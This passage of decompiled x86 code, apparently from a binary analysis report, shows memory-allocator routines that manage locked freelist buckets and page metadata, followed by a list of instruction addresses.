																														_t1144 =  *(_t1308 + _t1308 + 0x11580c) & 0x0000ffff;
																														_t870 - 0x41 = _t1144 - 0x76;
																														_t1379 = (_t1308 & 0xffffff00 | _t1144 - 0x00000076 > 0x00000000) & (_t870 & 0xffffff00 | _t870 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1144;
																														__eflags = _t1379;
																													}
																												}
																												_v112 = 0;
																												_v104 = 0xffffffff;
																												_t1262 = _t1004;
																												_t838 =  *_t1004 & 0x000000ff;
																												_v124 = _t838;
																												__eflags = _t838 - 2;
																												if(_t838 == 2) {
																													_t839 =  *0x123d89 & 0x000000ff;
																													__eflags = _t839 & 0x00000001;
																													if((_t839 & 0x00000001) != 0) {
																														L000B7BD0(_t1004, _t1484);
																													}
																												}
																												__eflags =  *((char*)(_t1262 + 3));
																												if( *((char*)(_t1262 + 3)) == 0) {
																													_t991 = (_t1379 & 0x0000ffff) << 5;
																													_t1421 = _t1262 + _t991 + 0x48;
																													_v136 = _t1262;
																													_t840 = _t1262 + 0x40;
																													_v116 = _t840;
																													__imp__TryAcquireSRWLockExclusive(_t840);
																													__eflags = _t840;
																													if(_t840 == 0) {
																														L000A8B90(_t840, _v120);
																													}
																													_t841 =  *_t1421;
																													_t1096 =  *_t841;
																													_v136 = _t1096;
																													__eflags = _t1096;
																													if(_t1096 == 0) {
																														goto L340;
																													} else {
																														_t1295 = _v140;
																														_v116 = 0;
																														_t1425 =  *((intOrPtr*)(_t1295 + 0x48 + _t991 + 0xc));
																														_t991 =  *((intOrPtr*)(_t1295 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1295 + 0xc));
																														_t1262 =  *_v136;
																														__eflags = _t1262;
																														if(_t1262 == 0) {
																															 *_t841 = 0;
																															goto L318;
																														} else {
																															_t1117 = _t1262;
																															asm("bswap ecx");
																															__eflags = (_t1117 ^ _v136) - 0x1fffff;
																															if((_t1117 ^ _v136) > 0x1fffff) {
																																L344:
																																asm("pcmpeqd xmm0, xmm0");
																																asm("movdqa [esp+0x30], xmm0");
																																_t1364 =  &_v100;
																																_t1060 = _t1364;
																																_push(0);
																																_push(_t1262);
																																L323:
																																_push(0x115ac8);
																																_t789 = L000A88D0(_t1060);
																																_push(_t1364);
																																goto L324;
																															} else {
																																__eflags = _t1117 & 0x001fc000;
																																if((_t1117 & 0x001fc000) == 0) {
																																	goto L344;
																																} else {
																																	asm("prefetcht0 [ecx]");
																																	 *_t841 = _t1117;
																																	goto L318;
																																}
																															}
																														}
																													}
																												} else {
																													_t1421 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0x123e38 * 4)) + 0xa0);
																													__eflags = _t1421 - 2;
																													_v116 = _t1379;
																													if(_t1421 < 2) {
																														_t1421 = _t1262;
																														_push( &_v104);
																														_push(_t1379 & 0x0000ffff);
																														_t860 = E000B9960(_t1421);
																														_t1262 = _t1421;
																														_v140 = _t860;
																														goto L246;
																													} else {
																														 *((intOrPtr*)(_t1421 + 8)) =  *((intOrPtr*)(_t1421 + 8)) + 1;
																														asm("adc dword [esi+0xc], 0x0");
																														_t1010 = _t1379 & 0x0000ffff;
																														__eflags =  *0x122d20 - _t1379;
																														if( *0x122d20 < _t1379) {
																															_t1385 = _t1262;
																															 *((intOrPtr*)(_t1421 + 0x28)) =  *((intOrPtr*)(_t1421 + 0x28)) + 1;
																															asm("adc dword [esi+0x2c], 0x0");
																															 *((intOrPtr*)(_t1421 + 0x18)) =  *((intOrPtr*)(_t1421 + 0x18)) + 1;
																															asm("adc dword [esi+0x1c], 0x0");
																															goto L301;
																														} else {
																															_t863 =  *(_t1421 + 0x58 + _t1010 * 8);
																															__eflags = _t863;
																															if(_t863 == 0) {
																																 *((intOrPtr*)(_t1421 + 0x20)) =  *((intOrPtr*)(_t1421 + 0x20)) + 1;
																																asm("adc dword [esi+0x24], 0x0");
																																 *((intOrPtr*)(_t1421 + 0x18)) =  *((intOrPtr*)(_t1421 + 0x18)) + 1;
																																asm("adc dword [esi+0x1c], 0x0");
																																_t1385 = _t1262;
																																E000A85A0(_t1421, _t1010);
																																_t1262 = _t1385;
																																_t863 =  *(_t1421 + 0x58 + _t1010 * 8);
																																__eflags = _t863;
																																if(_t863 != 0) {
																																	goto L241;
																																} else {
																																	goto L301;
																																}
																															} else {
																																 *((intOrPtr*)(_t1421 + 0x10)) =  *((intOrPtr*)(_t1421 + 0x10)) + 1;
																																asm("adc dword [esi+0x14], 0x0");
																																L241:
																																_t1364 =  *(_t1421 + 0x5e + _t1010 * 8) & 0x0000ffff;
																																_v132 = _t863;
																																_t791 =  *_t863;
																																__eflags = _t791;
																																if(_t791 == 0) {
																																	_t1131 = 0;
																																	__eflags = 0;
																																	goto L245;
																																} else {
																																	_t1131 = _t791;
																																	asm("bswap ecx");
																																	__eflags = _t1131 & 0x001fc000;
																																	if((_t1131 & 0x001fc000) == 0) {
																																		L325:
																																		asm("pcmpeqd xmm0, xmm0");
																																		asm("movdqa [esp+0x30], xmm0");
																																		_t1426 =  &_v92;
																																		_t792 = L000A88D0(_t1426, 0x115ac8, _t791, 0);
																																		_push(_t1426);
																																		E00070790(_t792);
																																		_t1466 = _t1466 + 4;
																																		L000A8960(_t1364, _t1484);
																																		L326:
																																		_t795 =  &_v96;
																																		_t1064 = _t991;
																																		L327:
																																		_t765 = L000B87D0(_t1064, _v124, _v0, _v108, 0x4000, _t795);
																																		_v128 = _t765;
																																		__eflags = _t765;
																																		if(_t765 == 0) {
																																			__imp__ReleaseSRWLockExclusive(_v112);
																																			_t1421 = 0;
																																			_t1029 = _v0;
																																			_t991 = _a8;
																																		} else {
																																			_t1302 = (_v108 >> 0x00000009 & 0x00000fe0) + (_v108 & 0xffe00000) - (( *((_v108 >> 0x00000009 & 0x00000fe0) + (_v108 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																																			_t817 = _t1302 + 0x1000;
																																			__eflags =  *(_t1302 + 0x100f) & 0x00000008;
																																			if(( *(_t1302 + 0x100f) & 0x00000008) != 0) {
																																				_t1225 =  &(_t817[8]);
																																			} else {
																																				_t1225 = _t817[2] + 0xc;
																																				__eflags = _t1225;
																																			}
																																			_t991 =  *_t1225 -  *((intOrPtr*)(_v124 + 0xc));
																																			_t1360 = _a4;
																																			L186:
																																			_t1284 = _v144;
																																			_t819 =  *((intOrPtr*)(_t1284 + 0x117c)) +  *(_t817[2] + 0xc);
																																			 *((intOrPtr*)(_t1284 + 0x117c)) = _t819;
																																			_t1083 =  *((intOrPtr*)(_t1284 + 0x1180));
																																			__eflags = _t1083 - _t819;
																																			_t820 =  >  ? _t1083 : _t819;
																																			 *((intOrPtr*)(_t1284 + 0x1180)) =  >  ? _t1083 : _t819;
																																			__imp__ReleaseSRWLockExclusive(_v132);
																																			_t1262 = _v148;
																																			_t1029 = _v0;
																																			_t765 = _v132;
																																			L73:
																																			_t1421 =  *((intOrPtr*)(_t1262 + 0x10)) + _t765;
																																			__eflags = _t1029 & 0x00000002;
																																			if((_t1029 & 0x00000002) != 0) {
																																				__eflags = _v120;
																																				if(_v120 == 0) {
																																					E000E11A0(_t1360, _t1421, 0, _t991);
																																					_t1262 = _v148;
																																					_t1029 = _v0;
																																					_t1466 = _t1466 + 0xc;
																																				}
																																			}
																																			__eflags =  *((char*)(_t1262 + 6));
																																			_t991 = _a8;
																																			if( *((char*)(_t1262 + 6)) != 0) {
																																				__eflags = _t765 & 0x00000fff;
																																				if((_t765 & 0x00000fff) == 0) {
																																					_t1088 = _t765;
																																					_t1262 = _t1088;
																																					_t828 = (_t765 & 0xffe00000) + (_t1088 >> 0x00000009 & 0x00000ff8) + 0x2000;
																																					_t1029 = _v0;
																																				} else {
																																					_t1262 = _t765;
																																					_t828 = _t765 + 0xfffffffc;
																																					__eflags = _t828;
																																				}
																																				 *_t828 = 1;
																																				_t765 = _t1262;
																																			}
																																			__eflags = _v144 - 2;
																																			if(_v144 == 2) {
																																				_t1262 = _t765;
																																				_t765 = _t765 >> 0x15;
																																				__eflags =  *((short*)(_t765 + _t765 + 0x122d24)) - 0xfffe;
																																				if( *((short*)(_t765 + _t765 + 0x122d24)) == 0xfffe) {
																																					_v148 = _t1262 & 0xffe00000;
																																					_t765 = 3 << (_t1262 >> 0x00000002 & 0x0000001e);
																																					_t1262 = _t1262 >> 0x00000005 & 0x0000fffc;
																																					asm("lock or [edx+ecx+0x4000], eax");
																																				}
																																				_t1029 = _v0;
																																			}
																																		}
																																		goto L107;
																																	} else {
																																		asm("prefetcht0 [ecx]");
																																		L245:
																																		 *((char*)(_t1421 + 0x5c + _t1010 * 8)) =  *((char*)(_t1421 + 0x5c + _t1010 * 8)) - 1;
																																		 *(_t1421 + 0x58 + _t1010 * 8) = _t1131;
																																		_v104 = _t1364;
																																		 *_t1421 =  *_t1421 - _t1364;
																																		__eflags =  *_t1421;
																																		L246:
																																		_t1105 = _v124;
																																		__eflags = _t1105;
																																		_t765 = _v0;
																																		if(_t1105 == 0) {
																																			_t1385 = _t1262;
																																			_t1010 = _v108 & 0x0000ffff;
																																			L301:
																																			_t991 = _t1010 << 5;
																																			_t1421 = _t1385 + _t991 + 0x48;
																																			_v128 = _t1385;
																																			_t861 = _t1385 + 0x40;
																																			_v108 = _t861;
																																			__imp__TryAcquireSRWLockExclusive(_t861);
																																			__eflags = _t861;
																																			if(_t861 == 0) {
																																				L000A8B90(_t861, _v112);
																																			}
																																			_t841 =  *_t1421;
																																			_t1121 =  *_t841;
																																			_v128 = _t1121;
																																			__eflags = _t1121;
																																			if(_t1121 == 0) {
																																				L340:
																																				_t765 = L000B87D0(_t1421, _v140, _v0, _v132, 0x4000,  &_v116);
																																				_v156 = _t765;
																																				__eflags = _t765;
																																				if(_t765 == 0) {
																																					__imp__ReleaseSRWLockExclusive(_v120);
																																					_t1360 = 0;
																																				} else {
																																					_t1292 = (_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) - (( *((_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																																					_t841 = _t1292 + 0x1000;
																																					__eflags =  *(_t1292 + 0x100f) & 0x00000008;
																																					if(( *(_t1292 + 0x100f) & 0x00000008) != 0) {
																																						_t1101 =  &(_t841[8]);
																																					} else {
																																						_t1101 = _t841[2] + 0xc;
																																						__eflags = _t1101;
																																					}
																																					_t991 =  *_t1101 -  *((intOrPtr*)(_v140 + 0xc));
																																					goto L319;
																																				}
																																				goto L254;
																																			} else {
																																				_t1299 = _v132;
																																				_v108 = 0;
																																				_t1425 =  *((intOrPtr*)(_t1299 + 0x48 + _t991 + 0xc));
																																				_t991 =  *((intOrPtr*)(_t1299 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1299 + 0xc));
																																				_t1364 =  *_v128;
																																				__eflags = _t1364;
																																				if(_t1364 == 0) {
																																					__eflags = 0;
																																					goto L317;
																																				} else {
																																					_t1262 = _t1364;
																																					asm("bswap edx");
																																					__eflags = (_t1262 ^ _v128) - 0x1fffff;
																																					if((_t1262 ^ _v128) > 0x1fffff) {
																																						L345:
																																						asm("pcmpeqd xmm0, xmm0");
																																						asm("movdqa [esp+0x30], xmm0");
																																						_t991 =  &_v92;
																																						_t789 = L000A88D0(_t991, 0x115ac8, _t1364, 0);
																																						_push(_t991);
																																						L324:
																																						E00070790(_t789);
																																						_t1466 = _t1466 + 4;
																																						_t791 = L000A8960(_t1425, _t1484);
																																						goto L325;
																																					} else {
																																						__eflags = _t1262 & 0x001fc000;
																																						if((_t1262 & 0x001fc000) == 0) {
																																							goto L345;
																																						} else {
																																							asm("prefetcht0 [edx]");
																																							L317:
																																							 *_t841 = 0;
																																							L318:
																																							_t1116 = _t841[3] & 0xffffc001 | _t841[3] + 0x00000002 & 0x00003ffe;
																																							__eflags = _t1116;
																																							_t841[3] = _t1116;
																																							L319:
																																							_t1293 = _v140;
																																							_t849 =  *((intOrPtr*)(_t1293 + 0x117c)) +  *(_t841[2] + 0xc);
																																							 *((intOrPtr*)(_t1293 + 0x117c)) = _t849;
																																							_t1421 = _v140;
																																							_t1104 =  *((intOrPtr*)(_t1421 + 0x1180));
																																							__eflags = _t1104 - _t849;
																																							_t850 =  >  ? _t1104 : _t849;
																																							 *((intOrPtr*)(_t1421 + 0x1180)) =  >  ? _t1104 : _t849;
																																							__imp__ReleaseSRWLockExclusive(_v120);
																																							_t1262 = _t1421;
																																							_t765 = _v0;
																																							_t1105 = _v140;
																																							goto L248;
																																						}
																																					}
																																				}
																																			}
																																		} else {
																																			_t991 = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																																			__eflags = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																																			L248:
																																			_t1360 =  *((intOrPtr*)(_t1262 + 0x10)) + _t1105;
																																			__eflags = _t765 & 0x00000002;
																																			if((_t765 & 0x00000002) != 0) {
																																				__eflags = _v120;
																																				if(_v120 == 0) {
																																					_t1421 = _t1262;
																																					_t991 = _t1105;
																																					_t765 = E000E11A0(_t1360, _t1360, 0, _t1105);
																																					_t1466 = _t1466 + 0xc;
																																				}
																																			}
																																			__eflags =  *((char*)(_t1262 + 6));
																																			if( *((char*)(_t1262 + 6)) != 0) {
																																				__eflags = _t1105 & 0x00000fff;
																																				if((_t1105 & 0x00000fff) == 0) {
																																					_t1262 = _t1105;
																																					_t765 = (_t1105 & 0xffe00000) + (_t1105 >> 0x00000009 & 0x00000ff8) + 0x2000;
																																				} else {
																																					_t765 = _t1105 - 4;
																																				}
																																				 *_t765 = 1;
																																			}
																																			__eflags = _v132 - 2;
																																			if(_v132 == 2) {
																																				_t765 = _t1105 >> 0x15;
																																				__eflags =  *((short*)(_t765 + _t765 + 0x122d24)) - 0xfffe;
																																				if( *((short*)(_t765 + _t765 + 0x122d24)) == 0xfffe) {
																																					_t765 = _t1105 & 0xffe00000;
																																					_t1262 = 3 << (_t1105 >> 0x00000002 & 0x0000001e);
																																					_t991 = _t1105 >> 0x00000005 & 0x0000fffc;
																																					asm("lock or [ebx+eax+0x4000], edx");
																																				}
																																			}
																																			L254:
																																			_v116 = _t1360;
																																			__eflags = _v128 & 0x00000001;
																																			if((_v128 & 0x00000001) != 0) {
																																				goto L273;
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										} else {
																											_t1360 = _v108;
																											L273:
																											_push(_a12);
																											_push(_a8);
																											_push(_t1360);
																											_t765 = E000CC3C0();
																											_t1360 = _v116;
																										}
																									} else {
																										__eflags = _t1162 & 0x001fc000;
																										if((_t1162 & 0x001fc000) == 0) {
																											goto L270;
																										} else {
																											asm("prefetcht0 [ecx]");
																											L198:
																											_t1360 = _a4;
																											 *_t900 = _t1162;
																											_t1165 = _t900[3] & 0xffffc001 | _t900[3] + 0x00000002 & 0x00003ffe;
																											__eflags = _t1165;
																											_t900[3] = _t1165;
																											L199:
																											_t1321 = _v136;
																											_t902 =  *((intOrPtr*)(_t1321 + 0x117c)) +  *(_t900[2] + 0xc);
																											 *((intOrPtr*)(_t1321 + 0x117c)) = _t902;
																											_t1167 =  *((intOrPtr*)(_t1321 + 0x1180));
																											__eflags = _t1167 - _t902;
																											_t903 =  >  ? _t1167 : _t902;
																											 *((intOrPtr*)(_t1321 + 0x1180)) =  >  ? _t1167 : _t902;
																											__imp__ReleaseSRWLockExclusive(_v116);
																											_t1262 = _v140;
																											_t1029 = _v0;
																											_t765 = _v136;
																											goto L100;
																										}
																									}
																								}
																							}
																						} else {
																							_t991 = _v92 -  *((intOrPtr*)(_t1262 + 0xc));
																							__eflags = _v92 -  *((intOrPtr*)(_t1262 + 0xc));
																							L100:
																							_t1421 =  *((intOrPtr*)(_t1262 + 0x10)) + _t765;
																							__eflags = _t1029 & 0x00000002;
																							if((_t1029 & 0x00000002) != 0) {
																								__eflags = _v101;
																								if(_v101 == 0) {
																									_t1398 = _t1029;
																									_v136 = _t765;
																									E000E11A0(_t1398, _t1421, 0, _t991);
																									_t765 = _v136;
																									_t1262 = _v140;
																									_t1029 = _t1398;
																									_t1466 = _t1466 + 0xc;
																								}
																							}
																							__eflags =  *((char*)(_t1262 + 6));
																							_t991 = _a8;
																							if( *((char*)(_t1262 + 6)) != 0) {
																								__eflags = _t765 & 0x00000fff;
																								if((_t765 & 0x00000fff) == 0) {
																									_v140 = _t765 & 0xffe00000;
																									_t1262 = _t765;
																									_t907 = _v140 + (_t765 >> 0x00000009 & 0x00000ff8) + 0x2000;
																									_t1029 = _v0;
																								} else {
																									_t1262 = _t765;
																									_t907 = _t765 + 0xfffffffc;
																									__eflags = _t907;
																								}
																								 *_t907 = 1;
																								_t765 = _t1262;
																							}
																							__eflags = _v128 - 2;
																							if(_v128 == 2) {
																								_t1262 = _t765;
																								_t765 = _t765 >> 0x15;
																								__eflags =  *((short*)(_t765 + _t765 + 0x122d24)) - 0xfffe;
																								if( *((short*)(_t765 + _t765 + 0x122d24)) == 0xfffe) {
																									_t765 = _t1262 & 0xffe00000;
																									_t1262 = _t1262 >> 0x00000005 & 0x0000fffc;
																									asm("lock or [edx+eax+0x4000], edi");
																								}
																								_t1029 = _v0;
																								L171:
																								_t1360 = _a4;
																							}
																							_v112 = _t1421;
																							__eflags = _v124 & 0x00000001;
																							if((_v124 & 0x00000001) != 0) {
																								L159:
																								_push(_a12);
																								_push(_t991);
																								_push(_t1421);
																								_t765 = E000CC3C0();
																								_t1466 = _t1466 + 0xc;
																								_t1421 = _v112;
																							}
																							L107:
																							__eflags = _t1421;
																							if(_t1421 == 0) {
																								_t1360 = 0;
																								__eflags = _t1029 & 0x00000001;
																								if(__eflags == 0) {
																									goto L21;
																								}
																							} else {
																								_t821 = _v104;
																								__eflags = _t821 - _t991;
																								L000E0C20(_t1421, _t1360, _t991);
																								_t765 = E000BB3A0(_t1484, _t1360);
																								_t1360 = _t1421;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t1360 = 0;
										__eflags = _t1262 & 0x00000001;
										if(__eflags == 0) {
											L21:
											_push(_t991);
											_t765 = L000C5A50(_t765, _t1029, _t1262, __eflags, _t1484);
											goto L22;
										}
									}
								}
							}
							__eflags = _v76 ^ _t1460;
							E000DE643(_t765, _t991, _v76 ^ _t1460, _t1262, _t1360, _t1421);
							return _t1360;
						} else {
							_t990 = _a4 & 0x0000ffff;
							_push(__ecx);
							_t760 = L000A80A0(_t990, __ecx, 0);
							_t1474 = _t1463 + 4;
							asm("lock dec dword [edi+0x13d0]");
							_t1358 = _t760;
							 *((intOrPtr*)(_t760 + 8)) =  *((intOrPtr*)(_t760 + 8)) + 1;
							asm("adc dword [eax+0xc], 0x0");
							if( *0x122d20 < _t990) {
								 *((intOrPtr*)(_t1358 + 0x28)) =  *((intOrPtr*)(_t1358 + 0x28)) + 1;
								asm("adc dword [edi+0x2c], 0x0");
								 *((intOrPtr*)(_t1358 + 0x18)) =  *((intOrPtr*)(_t1358 + 0x18)) + 1;
								asm("adc dword [edi+0x1c], 0x0");
								goto L11;
							} else {
								_t990 = _t990 & 0x0000ffff;
								if( *(_t1358 + 0x58 + _t990 * 8) == 0) {
									 *((intOrPtr*)(_t1358 + 0x20)) =  *((intOrPtr*)(_t1358 + 0x20)) + 1;
									asm("adc dword [edi+0x24], 0x0");
									 *((intOrPtr*)(_t1358 + 0x18)) =  *((intOrPtr*)(_t1358 + 0x18)) + 1;
									asm("adc dword [edi+0x1c], 0x0");
									E000A85A0(_t1358, _t990);
									_t760 =  *(_t1358 + 0x58 + _t990 * 8);
									__eflags = _t760;
									if(_t760 != 0) {
										goto L6;
									} else {
										goto L11;
									}
								} else {
									 *((intOrPtr*)(_t1358 + 0x10)) =  *((intOrPtr*)(_t1358 + 0x10)) + 1;
									asm("adc dword [edi+0x14], 0x0");
									L6:
									_t1420 =  *(_t1358 + 0x5e + _t990 * 8) & 0x0000ffff;
									_t1261 =  *_t760;
									if(_t1261 == 0) {
										_t1257 = 0;
										__eflags = 0;
										L10:
										 *((char*)(_t1358 + 0x5c + _t990 * 8)) =  *((char*)(_t1358 + 0x5c + _t990 * 8)) - 1;
										 *(_t1358 + 0x58 + _t990 * 8) = _t1257;
										 *_a8 = _t1420;
										 *_t1358 =  *_t1358 - ( *(_t1358 + 0x5e + _t990 * 8) & 0x0000ffff);
										_t1420 = _t760;
										goto L11;
									} else {
										_t1257 = _t1261;
										asm("bswap ecx");
										if((_t1257 & 0x001fc000) == 0) {
											asm("pcmpeqd xmm0, xmm0");
											asm("movdqa [esp], xmm0");
											_t1358 = _t1474;
											_t987 = L000A88D0(_t1358, 0x115ac8, _t1261, 0);
											_push(_t1358);
											E00070790(_t987);
											_t1463 = _t1474 + 4;
											_t1029 = _t1420;
											L000A8960(_t1029, _t1484);
											goto L16;
										} else {
											asm("prefetcht0 [ecx]");
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}

0x000b9969
0x000b996c
0x000b996e
0x000b9975
0x000b9979
0x000b997e
0x000b9985
0x000b9988
0x000b9991
0x000b9a2b
0x000b9a31
0x000b9a3f
0x000b9997
0x000b9997
0x000b999f
0x00000000
0x000b99a5
0x000b99aa
0x000b99b7
0x000b9aa0
0x000b9aa0
0x000b9aa1
0x000b9aa3
0x000b9aa4
0x000b9aa5
0x000b9aa6
0x000b9aa7
0x000b9aa8
0x000b9aa9
0x000b9aaa
0x000b9aab
0x000b9aac
0x000b9aad
0x000b9aae
0x000b9aaf
0x000b9ab0
0x000b9ab1
0x000b9ab3
0x000b9ab4
0x000b9ab5
0x000b9ab9
0x000b9abc
0x000b9abf
0x000b9ac2
0x000b9ac5
0x000b9aca
0x000b9acc
0x000b9ad0
0x000b9ad3
0x000b9ad5
0x000ba145
0x000ba148
0x000ba1d2
0x000ba1d4
0x000bacee
0x000ba1da
0x000ba1da
0x000ba1da
0x000ba1dc
0x000ba1df
0x000ba1e1
0x00000000
0x000ba1e7
0x000ba1e7
0x000ba1eb
0x000ba1ee
0x000ba1f2
0x000ba1f4
0x000ba318
0x000ba31d
0x000ba31f
0x000ba321
0x000ba324
0x000ba324
0x000ba324
0x000ba327
0x000ba343
0x000ba346
0x000ba349
0x000ba34c
0x000ba34c
0x000ba1fa
0x000ba1fa
0x000ba1fd
0x000ba35e
0x000ba363
0x000ba365
0x000ba367
0x000ba36a
0x000ba36a
0x000ba36a
0x000ba377
0x000ba37b
0x000ba387
0x000ba38c
0x000ba38f
0x000ba392
0x000ba3a0
0x000ba3ac
0x000ba203
0x000ba203
0x000ba209
0x000ba20b
0x000ba211
0x000ba21b
0x000ba21c
0x000ba846
0x000ba222
0x000ba222
0x000ba225
0x000ba225
0x000ba85e
0x000ba862
0x000ba862
0x000ba86a
0x000ba86f
0x000ba871
0x000ba873
0x000ba876
0x000ba876
0x000ba876
0x000ba887
0x000ba895
0x000ba898
0x000ba89b
0x000ba89e
0x000ba8ac
0x000ba8b8
0x000ba8b8
0x000ba8b8
0x000ba1fd
0x000ba8ba
0x000ba8bf
0x000ba8c7
0x000ba8c9
0x000ba8cc
0x000ba8cf
0x000bacf8
0x000bacff
0x000bad01
0x000bad09
0x000bad09
0x000bad01
0x000ba8d5
0x000ba8d9
0x000ba8dd
0x000bab72
0x000bab78
0x000bab7b
0x000bab7f
0x000bab7f
0x000bab82
0x000bab87
0x000bab8d
0x000bab8f
0x000bab95
0x000bab95
0x000bab9a
0x000bab9c
0x000bab9e
0x000baba2
0x000baba4
0x00000000
0x000babaa
0x000babaa
0x000babb1
0x000babb6
0x000babbc
0x000babc3
0x000babc5
0x000babc7
0x000bafa1
0x00000000
0x000babcd
0x000babcd
0x000babcf
0x000babd7
0x000babdd
0x00000000
0x000babe3
0x000babe5
0x000babeb
0x00000000
0x000babf1
0x000babf1
0x000babf4
0x00000000
0x000babf4
0x000babeb
0x000babdd
0x000babc7
0x000ba8e3
0x000ba8e3
0x000ba8f2
0x000ba8fb
0x000ba8ff
0x000ba902
0x000badca
0x000badcb
0x000badcf
0x000badd1
0x000badd8
0x00000000
0x000ba908
0x000ba908
0x000ba90c
0x000ba910
0x000ba913
0x000ba91a
0x000badfe
0x000bae00
0x000bae04
0x000bae08
0x000bae0c
0x00000000
0x000ba920
0x000ba920
0x000ba924
0x000ba926
0x000baeb7
0x000baebb
0x000baebf
0x000baec3
0x000baeca
0x000baecc
0x000baed1
0x000baed3
0x000baed7
0x000baed9
0x00000000
0x000baedf
0x00000000
0x000baedf
0x000ba92c
0x000ba92c
0x000ba930
0x000ba934
0x000ba934
0x000ba939
0x000ba93d
0x000ba93f
0x000ba941
0x000ba958
0x000ba958
0x00000000
0x000ba943
0x000ba943
0x000ba945
0x000ba947
0x000ba94d
0x000bb0a7
0x000bb0ab
0x000bb0b1
0x000bb0b5
0x000bb0b7
0x000bb0b9
0x00000000
0x000ba953
0x000ba953
0x000ba95a
0x000ba95a
0x000ba95e
0x000ba962
0x000ba966
0x000ba966
0x000ba968
0x000ba968
0x000ba96c
0x000ba96e
0x000ba971
0x000bae29
0x000bae2b
0x000bae2f
0x000bae2f
0x000bae32
0x000bae36
0x000bae39
0x000bae3d
0x000bae40
0x000bae45
0x000bae4b
0x000bae4d
0x000bae53
0x000bae53
0x000bae58
0x000bae5a
0x000bae5c
0x000bae60
0x000bae62
0x000bb1f3
0x000bb20a
0x000bb20f
0x000bb213
0x000bb215
0x00000000
0x000bb21b
0x000bb240
0x000bb242
0x000bb248
0x000bb24f
0x000bb378
0x000bb255
0x000bb258
0x000bb258
0x000bb258
0x000bb261
0x00000000
0x000bb261
0x000bae68
0x000bae68
0x000bae6f
0x000bae74
0x000bae7a
0x000bae81
0x000bae83
0x000bae85
0x000bafab
0x00000000
0x000bae8b
0x000bae8b
0x000bae8d
0x000bae95
0x000bae9b
0x00000000
0x000baea1
0x000baea3
0x000baea9
0x00000000
0x000baeaf
0x000baeaf
0x000bafad
0x000bafad
0x000bafaf
0x000bafc1
0x000bafc1
0x000bafc3
0x000bafc6
0x000bafc9
0x000bafd3
0x000bafd6
0x000bafdc
0x000bafe0
0x000bafe6
0x000bafe8
0x000bafeb
0x000baff5
0x000baffb
0x000baffd
0x000bb000
0x00000000
0x000bb000
0x000baea9
0x000bae9b
0x000bae85
0x000ba977
0x000ba97b
0x000ba97b
0x000ba97e
0x000ba981
0x000ba983
0x000ba985
0x000bad3c
0x000bad41
0x000bad4b
0x000bad4d
0x000bad4f
0x000bad58
0x000bad41
0x000ba98b
0x000ba98f
0x000ba994
0x000ba996
0x000ba99c
0x000bb06e
0x000bb07b
0x000ba9a2
0x000ba9a2
0x000ba9a2
0x000ba9a5
0x000ba9a5
0x000ba9ab
0x000ba9ae
0x000ba9b6
0x000ba9b9
0x000ba9c2
0x000ba9cc
0x000ba9dc
0x000ba9e1
0x000ba9e7
0x000ba9e7
0x000ba9c2
0x000ba9ae
0x000ba971
0x000ba94d
0x000ba941
0x000ba926
0x000ba91a
0x000ba902
0x000ba8dd
0x000ba14e
0x000ba14e
0x000ba156
0x000ba15d
0x000ba161
0x000ba163
0x00000000
0x00000000
0x00000000
0x00000000
0x000ba163
0x000b9adb
0x000b9adb
0x000b9add
0x000ba1c3
0x000ba1cb
0x000b9ae3
0x000b9ae3
0x000b9ae9
0x000b9afc
0x000b9afc
0x000b9b00
0x000b9b0d
0x000b9b0f
0x000b9b17
0x000b9b1b
0x000b9b1e
0x000ba233
0x000ba235
0x000ba23c
0x000ba23f
0x000ba241
0x00000000
0x000ba247
0x00000000
0x000ba247
0x000b9b24
0x000b9b24
0x000b9b49
0x000b9b51
0x000b9b56
0x000b9b58
0x000b9b5c
0x000b9b62
0x000b9b64
0x000b9b68
0x000b9b68
0x000b9b6d
0x000b9b71
0x000ba24c
0x000b9b77
0x000b9b7a
0x000b9b7a
0x000b9b7a
0x000b9b82
0x000b9b86
0x000b9b89
0x000b9b8d
0x000ba25b
0x000ba263
0x000ba269
0x000ba26b
0x000ba26e
0x000ba271
0x00000000
0x000ba277
0x000ba277
0x000ba27c
0x000ba288
0x000ba28d
0x000ba27c
0x000b9b93
0x000b9b94
0x000b9b9c
0x000b9ba1
0x000b9ba5
0x000b9baa
0x000b9bac
0x000b9bb2
0x000b9bb2
0x000b9bb5
0x000b9bb8
0x000b9c28
0x000b9c2f
0x000b9c2f
0x000b9c31
0x00000000
0x000b9c37
0x000b9c37
0x000b9c3b
0x000b9c3e
0x000b9c42
0x000b9c76
0x000b9c7b
0x000b9c7d
0x000b9c7f
0x000b9c82
0x000b9c82
0x000b9c82
0x000b9c85
0x000b9ca4
0x000b9ca7
0x000b9caa
0x000b9c44
0x000b9c44
0x000b9c47
0x000b9cbc
0x000b9cc1
0x000b9cc3
0x000b9cc5
0x000b9cc8
0x000b9cc8
0x000b9cc8
0x000b9cd9
0x000b9ce5
0x000b9cea
0x000b9ced
0x000b9cf0
0x000b9cfe
0x000b9d0a
0x000b9c49
0x000b9c49
0x000b9c4f
0x000b9c51
0x000b9c57
0x000b9c5f
0x000b9c60
0x000b9db9
0x000b9c66
0x000b9c66
0x000b9c69
0x000b9c69
0x000b9dd1
0x000b9dd3
0x000b9dd3
0x000b9ddb
0x000b9de0
0x000b9de2
0x000b9de4
0x000b9de7
0x000b9de7
0x000b9de7
0x000b9df8
0x000b9e06
0x000b9e09
0x000b9e0c
0x000b9e0f
0x000b9e1d
0x000b9e29
0x000b9e29
0x000b9e29
0x000b9c47
0x000b9e2b
0x000b9e30
0x000b9e38
0x000b9e3c
0x000b9e3f
0x000b9e42
0x000ba4bc
0x000ba4c3
0x000ba4c5
0x000ba4cb
0x000ba4d0
0x000ba4d0
0x000ba4c5
0x000b9e48
0x000b9e4c
0x000b9e50
0x000ba298
0x000ba29e
0x000ba2a1
0x000ba2a4
0x000ba2a9
0x000ba2af
